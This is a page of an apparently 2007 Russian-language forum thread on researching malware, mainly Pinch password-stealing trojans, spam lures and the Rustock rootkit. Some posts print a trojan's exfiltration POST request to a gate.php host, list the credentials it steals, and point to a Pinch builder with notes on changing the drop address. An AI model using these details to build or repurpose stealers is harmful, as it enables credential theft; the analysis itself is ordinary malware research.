Сейчас на форуме: johnniewalker, Kybyx, testrev1337, bedop66938, vsv1 (+7 невидимых)

 eXeL@B —› Крэки, обсуждения —› Исследование вирусов
<< . 1 . 2 . 3 . 4 . 5 . 6 . 7 . 8 . 9 . 10 ... 47 . 48 . >>
Посл.ответ Сообщение

Ранг: -0.2 (гость)
Активность: 0=0
Статус: Участник

Создано: 13 октября 2006 23:15 · Поправил: Модератор
· Личное сообщение · #1

В этом топике происходит исследование малвари: вирусни, троянов, как их вычистить и тд.




Ранг: 233.1 (наставник), 30thx
Активность: 0.210
Статус: Участник

Создано: 11 января 2007 09:29
· Личное сообщение · #2

Marisha пишет:
У тебя пинч был

Ну вроде пронесло меня......
вовремя его заметил.

-----
AutoIt





Ранг: 155.4 (ветеран)
Активность: 0.140
Статус: Участник
Робо-Алкаш

Создано: 11 января 2007 09:31
· Личное сообщение · #3

Жалко мне такое не приходило... кстати на вебфайле истек срок хранения того экзешника киньте
кто-нить на рапиду плз

-----
Researcher





Ранг: 216.9 (наставник), 85thx
Активность: 0.310.15
Статус: Участник
X-Literator

Создано: 11 января 2007 11:49 · Поправил: Crawler
· Личное сообщение · #4

Spirit_Fenix пишет:
самое интересное, что на маил.ру стоит антивирус, но все равно пропускает

Антивирус мыла г*вно. Юзать надо не антивири, а сандбокс, файрвол и мозги.
Как вообще можно запускать какую-та малопонятную программу от неизвестного адресата? Тайна.

Кстати, а есть какой-нибудь краклабовский фтпшник, например?

-----
Харе курить веники и нюхать клей, к вам едет из Америки бог Шива, и он еврей.





Ранг: 241.9 (наставник), 107thx
Активность: 0.140.01
Статус: Участник

Создано: 11 января 2007 12:00
· Личное сообщение · #5

Люди а есть у кого-нить пинч- посмотреть охота



Ранг: 1.8 (гость)
Активность: 0=0
Статус: Участник

Создано: 12 января 2007 02:48
· Личное сообщение · #6

Crawler я-то не запускал.. я знаю, что там лежит обычно) но еще встречаются люди, которые запускают файлы, пришедшие из совершенно неизвестных мест.

Nightshade Одному знакомому прислали Trojan-PSW.Win32.LdPinch.bad, могу переслать, если надо..
Кстати (сразу извиняюсь за тупой вопрос), как бы узнать, на какое мыло отсылает данные, выше указанный троян?




Ранг: 500.6 (!), 7thx
Активность: 0.260
Статус: Участник

Создано: 12 января 2007 04:29
· Личное сообщение · #7

Spirit_Fenix пишет:
на какое мыло отсылает данные, выше указанный троян?


Запусти, узнаеш.



Ранг: 46.5 (посетитель)
Активность: 0.070
Статус: Участник

Создано: 12 января 2007 04:31
· Личное сообщение · #8

Nightshade пишет:
Люди а есть у кого-нить пинч- посмотреть охота

гугл те в помощь. паблик троев полно
NIKOLA пишет:
Запусти, узнаеш.






Ранг: 233.1 (наставник), 30thx
Активность: 0.210
Статус: Участник

Создано: 12 января 2007 08:19
· Личное сообщение · #9

2 Nightshade:
На предыдущей странице в третьем посте я цеплял пинча, которым был заражон сам.
Кстате тоже бы хотелось узнать на какое мыло он слал.
ДА и вообще поподробнее о нём...

-----
AutoIt




Ранг: 74.4 (постоянный)
Активность: 0.050
Статус: Участник

Создано: 12 января 2007 09:39 · Поправил: WoLFeR
· Личное сообщение · #10

OLEGator пишет:
Кстате тоже бы хотелось узнать на какое мыло он слал.

А какие собственно проблемы. WMWARE+OLLYDBG+IRIS и все узнаеш, и необязательно он на мыло шлет, может просто HTTP запрос с нужной инфой на сайт делать, а PHP скрипт сам логи ведет.




Ранг: 221.8 (наставник)
Активность: 0.150
Статус: Участник

Создано: 12 января 2007 09:48
· Личное сообщение · #11

OLEGator несколько криво распаковалось но вроде на uniqload@topmail.kz : проверять на основной машине нет никакого желания : впринципе пасы то не уйдут но вычещать эту хрень не охото...




Ранг: 80.5 (постоянный)
Активность: 0.030
Статус: Участник

Создано: 12 января 2007 13:56 · Поправил: apple
· Личное сообщение · #12

Вообщем тот вирь создает файлы ie-hook.txt, hook.txt и pass.bin, тырит что-то с ICQ (именно аськи от Mirabilis), аутглюка, тоталкоммандера, инеткома, осла, какого-то RimArts, CuteFTP, диалапа, Оперы, по-моему какого-то неизвестного мне ftp-сервера(клиента?), Мозиллы, Эудоры, Тундербёрда, МайлРу агента, Миранды, R&Q, &RQ, TheBat, логины от плагина Far hosts, Триллиана, qaim, qip, FileZilla, Mozilla Firefox, Punto Switcher (?!), SmartFTP, Passport.NET, USDownloader,

Детекта ВМ нет.
Отправляет 'POST /reports/gate.php HTTP/1.0',0Dh,0Ah,'Host: %s',0Dh,0Ah,'%s-Type: application/x-www-form-urlencoded',0Dh,0Ah,'%s-Length: %u',0Dh,0Ah,0Dh,0Ah,'a=uniqload@topmail.kz&b=Rep&d=%s&c=',0
Где HOST - bakayar0.info

Есть похоже что-то зашифрованное NXjFJfTiSUXqrxkPQrGiv
Хранился троянчик у автора в H:SPloitcsrss.exe

Блин, хочу конфигуратор!!! (если есть) да и строку расшифровать/перешифровать не лишне, если это хост

-----
ring 0





Ранг: 221.8 (наставник)
Активность: 0.150
Статус: Участник

Создано: 12 января 2007 14:08 · Поправил: Red Bar0n
· Личное сообщение · #13

есть конфигуратор склееный с троем но расклееть трой и поменять этим же конфигуратором мыла вопрос 5 минут ;
dобще это берецо любой скампилиный пинч 2.98 или какой там последний... и меняецо мыло но функционал не прибавляецо от этого : все что было в трое то и остаецо ибо при кампеляции билда те строки были закаментены. называецо та хрень pinch3 от Васьки...
hxxp://www.webfile.ru/1214621 только ахтунг! билдер склеен парсер непроверял.
пароли уходят kat00x@gmail.com через smtp.inbox.ru :\




Ранг: 221.8 (наставник)
Активность: 0.150
Статус: Участник

Создано: 12 января 2007 16:37
· Личное сообщение · #14

хех вот еще один "пенч3" проспамили по ойсикю
201763668 (02:26:12 13/01/2007)
Запрос авторизации
Porno s ZHana Friski toka u nas!!!!
Zaydite syuda: hxxp://slil.ru/23734215

отчеты падают на www.sudga.org/agate/gate.php
много всего пытаецо спереть а также обойти касперчега и аутпост через нажатие на кнопке
упакован "прЕватным криптором" бугого 14 секций с произвольными именами... распаковываецо на раз =//




Ранг: 233.1 (наставник), 30thx
Активность: 0.210
Статус: Участник

Создано: 13 января 2007 00:00
· Личное сообщение · #15

Red Bar0n пишет:
uniqload@topmail.kz


Гы...
казахи взялись за компы!


apple пишет:
Punto Switcher (?!)

А это блин очень меня насторожило!
Так если у пинтосвитчера включена функция дневника, то он является тем же кейлоггером. и дневник паролится.
Хорошо если он тырит тока пароль, а если и сам фаел дневника?
йоп!!!!

2 Red Bar0n:
Так всётаки интересно!
Тот который у меня сидел (csrss.exe) Это и есть всем известный пинч 3 ?
Или это чьято собственная разработка?
неуж казахи научились делать?
Гы...


-----
AutoIt




Ранг: 108.7 (ветеран)
Активность: 0.040
Статус: Участник

Создано: 13 января 2007 04:11 · Поправил: Freecod
· Личное сообщение · #16

Удивительно неужели ещё есть люди, запускающие файлы с расширением .exe от неизвесных людей?

Впрочем, читать спам иногда интересно, мне вот прислал письмо SADIQ HASSAN, расказывает, что он дружбан покойного Саддама, и тот завещял забрать со своего счёта 30 лимонов баксов, но вот беда, надо перегнать бабки на другой счёт, что бы их снять. Не помогу ли я доблесным бойцам с американской тиранией за 35%, от меня всего-то надо - номер счёта и
NAME
ADDRESS
TEL/FAX…..MOBILE LINE
OCCUPATION
ORGANISATION
DATE OF BIRTH
COUNTRY
PRIVATE EMAIL ADDRESS

Счастье ! Бегу отправлять реквизиты на мыльник в домене 4-го уровня
sadiq@hassandiq.orangehome.co.uk

PS Обратите внимание на домен - без украины не обошлось )))



Ранг: 4.9 (гость)
Активность: 0.010
Статус: Участник

Создано: 13 января 2007 05:59
· Личное сообщение · #17

Вот умора!!!!!



Ранг: 20.9 (новичок), 4thx
Активность: 0.010
Статус: Участник

Создано: 13 января 2007 06:45
· Личное сообщение · #18

Шик, я тоже так хочу. Только .uk это не Украина. Украина - .ua



Ранг: 108.7 (ветеран)
Активность: 0.040
Статус: Участник

Создано: 13 января 2007 07:10
· Личное сообщение · #19

да нет, я про orangehome




Ранг: 221.8 (наставник)
Активность: 0.150
Статус: Участник

Создано: 13 января 2007 09:50
· Личное сообщение · #20

OLEGator пишет:

Тот который у меня сидел (csrss.exe) Это и есть всем известный пинч 3 ?
Или это чьято собственная разработка?
неуж казахи научились делать?

это баяный пинч от дамрая так как тянет пароли для qip сталобыть версия старше 2.58 =\ казахи нехрена не научились делать походу только покупают билды и криптуют их =\




Ранг: 216.9 (наставник), 85thx
Активность: 0.310.15
Статус: Участник
X-Literator

Создано: 13 января 2007 12:21
· Личное сообщение · #21

(off)
OLEGator пишет:
неуж казахи научились делать?


Гыгы. Я одно время там жил, там не только казахи живут (/off)

Red Bar0n пишет:
hxxp://www.webfile.ru/1214621 только ахтунг! билдер склеен парсер непроверял.
пароли уходят kat00x@gmail.com через smtp.inbox.ru :


А не вломить ли сцуке флудоспамом ?

-----
Харе курить веники и нюхать клей, к вам едет из Америки бог Шива, и он еврей.




Ранг: 228.7 (наставник), 2thx
Активность: 0.120
Статус: Участник
malware research

Создано: 13 января 2007 14:15 · Поправил: Error_Log
· Личное сообщение · #22

Столько шума вокруг пустоты. Другое дело, если бы поймал кто-то какого-то интересного трояна... а так не пойму, что там казахи (или не казахи, не важно) научились делать. ИМХО нифига они не научились. Когда аверы поймали Backdoor.Rustok.B они удивлялись куда больше

>Among Rustock's distinguishing characteristics are its heavy reliance on advanced rootkit technologies to hide from security software and its changeling-like ability to morph itself each time it infects a file.

>Hide itself from applications:

RootkitRevealer
BlackLight
Rkdetector
gmer.exe
endoscope.EXE
DarkSpy
Anti-Rootkit
...
Даже статью написали:
Rustock Trojan A Model For Future Threats http://www.informationweek.com/story/showArticle.jhtml?articleID=196603916&cid=RSSfeed_IWK_News

-----
Research is my purpose




Ранг: 163.7 (ветеран)
Активность: 0.070
Статус: Участник

Создано: 13 января 2007 17:42 · Поправил: S_T_A_S_
· Личное сообщение · #23

Rustok.B - это v1.2?

Присутствие руткита может быть обнаружено достаточно просто - пробуем создать подветку pe386 в
HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services


Кста, автор уже давно обещал С =)



Ранг: 191.8 (ветеран), 46thx
Активность: 0.170
Статус: Участник

Создано: 14 января 2007 22:57
· Личное сообщение · #24

Вот ещё один встретил
UnHackMe ver. 4.0.4.257 | 1.5 MB
www.ftp2share.com/file/15514/um404257_cl.rar.html



Ранг: 228.7 (наставник), 2thx
Активность: 0.120
Статус: Участник
malware research

Создано: 14 января 2007 23:19
· Личное сообщение · #25

Ratinsh пишет:
UnHackMe ver. 4.0.4.257

фигня это а не антируткит

-----
Research is my purpose





Ранг: 216.9 (наставник), 85thx
Активность: 0.310.15
Статус: Участник
X-Literator

Создано: 15 января 2007 06:57
· Личное сообщение · #26

Из статьи:
"It's a true polymorphic," Martin says

Гыгы. Кого они хотели этим удивить

[ОФФ]
Freecod пишет:
PS Обратите внимание на домен - без украины не обошлось )))

Гыгы. Только сейчас заметил и ржалпацтулом 3 часа.
[/ОФФ]

Error_Log пишет:
Ratinsh пишет:
UnHackMe ver. 4.0.4.257
фигня это а не антируткит

мдя. Это не руткит, а покет новобранца-извращенца.

-----
Харе курить веники и нюхать клей, к вам едет из Америки бог Шива, и он еврей.




Ранг: 0.6 (гость)
Активность: 0=0
Статус: Участник

Создано: 19 января 2007 18:21
· Личное сообщение · #27

хаха, интересно было прочитать про умных казахов ))). Когда-то давным давно в хелпе к первому пинчу кто-то написал что отчёты от трояна без проблем приходят на topmail.kz, и до сих пор детишки юзают там мыльники, используя этот пример )).




Ранг: 233.1 (наставник), 30thx
Активность: 0.210
Статус: Участник

Создано: 20 января 2007 08:05 · Поправил: OLEGator
· Личное сообщение · #28

А я наверное опять чёта подцепил...
Сегодня утром из моей ацки какаято сволочь вылазила и клянчала денег у моего другана.

Но благо, я предпологал, что это может случиться и контакт лист храню только локально!
На серваке пусто! И в итоге нарушитель мог обуть только тех, кто сам к нему постучался первым.

Блин....
надо завязывать с рыбалкой...
Столько мусора летит...

з.ы.
только что подсказали что возможно это оно:
hxxp://im.avtoban.com/
типа прога для асикью протокола всякие фичи...

-----
AutoIt





Ранг: 156.2 (ветеран), 2thx
Активность: 0.090
Статус: Участник

Создано: 22 января 2007 14:11
· Личное сообщение · #29

Мне только что пришло пустое (никакого текста внутри) сообщение непонятно от кого.
И какой-то непонятный файл внутри. Не стал его открывать.

ОТ: Mccarthy Anthony <mrrdz@movie.fr>
ТЕМА: Hugging My Pillow
RFC:
Return-path: <mrrdz@movie.fr>
Received: from [75.167.28.57] (port=3636
helo=75-167-28-57.phnx.qwest.net)
by mx31.mail.ru with esmtp
id 1H95Ca-000EW8-00

Народ, посмотрите, что это за вирус. У меня Norton Antivirus молчит...



cbf8_22.01.2007_CRACKLAB.rU.tgz - greeting card.exe




Ранг: 221.8 (наставник)
Активность: 0.150
Статус: Участник

Создано: 22 января 2007 14:19
· Личное сообщение · #30

Mavlyudov
ну сть же www.virustotal.com/en/indexx.html :\

вот что выдал плаген к фф (онлайн чек дрвеба)

Размер файла: 46739 байт

cbf8_22.01.2007_CRACKLAB.rU.tgz - archive GZIP
>cbf8_22.01.2007_CRACKLAB.rU.tgz/gziped.gz - archive TAR
В файле >>cbf8_22.01.2007_CRACKLAB.rU.tgz/gziped.gz/greeting card.exe обнаружен вирус Trojan.DownLoader.17767




Ранг: 467.7 (мудрец), 5thx
Активность: 0.270
Статус: Участник
Иной :)

Создано: 23 января 2007 05:41
· Личное сообщение · #31

Mavlyudov
Тут и думать даже не надо =) Вирусня 100%. Так как нахрена ХЗ кому слать открытку в EXE формате и к тому же ничего не написав.

Хотя из 100 человек 10 дебилов запустят ради любопытства

P.S. Многим походу дела прислали Так как и мне тоже приходило (письмо грохнул даже не задумываясь).

-----
Computer Security Laboratory



<< . 1 . 2 . 3 . 4 . 5 . 6 . 7 . 8 . 9 . 10 ... 47 . 48 . >>
 eXeL@B —› Крэки, обсуждения —› Исследование вирусов
Эта тема закрыта. Ответы больше не принимаются.
   Для печати Для печати